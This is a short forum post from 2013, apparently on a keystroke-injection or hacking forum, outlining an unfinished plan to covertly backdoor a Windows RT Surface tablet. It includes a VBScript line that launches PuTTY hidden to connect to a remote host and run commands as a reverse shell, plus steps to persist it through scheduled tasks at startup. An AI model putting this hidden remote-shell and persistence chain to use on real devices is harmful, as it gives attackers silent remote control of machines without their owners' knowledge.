sober Posted February 28, 2013 Posted February 28, 2013 still needs some constructing so work in progress premise: modify win 8 surface batchfile including adding jailbreak to startup, install putty for surface. vbsscript for reverse shell hidden. add to startup w/ schtasks tasks: modify batch (in progress also need to make sure when added to startup do not need volume depress) http://forum.xda-developers.com/showthread.php?t=2092158 putty on surface: http://forum.xda-developers.com/showthread.php?t=2092348 powershell on rt: http://jeffwouters.nl/index.php/2012/10/windows-rt-has-powershell/ vbs script for putty: Set WshShell = WScript.CreateObject("WScript.Shell")WshShell.Run "putty.exe -ssh -2 user@sever.com -pw password -m command.cmd", 0' 0 => hide schtasks: my other psts in this forum needed: need to look at ducky coding for volume down button else hit it manually did this`because was feeling bit too safe on my surface discuss? Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.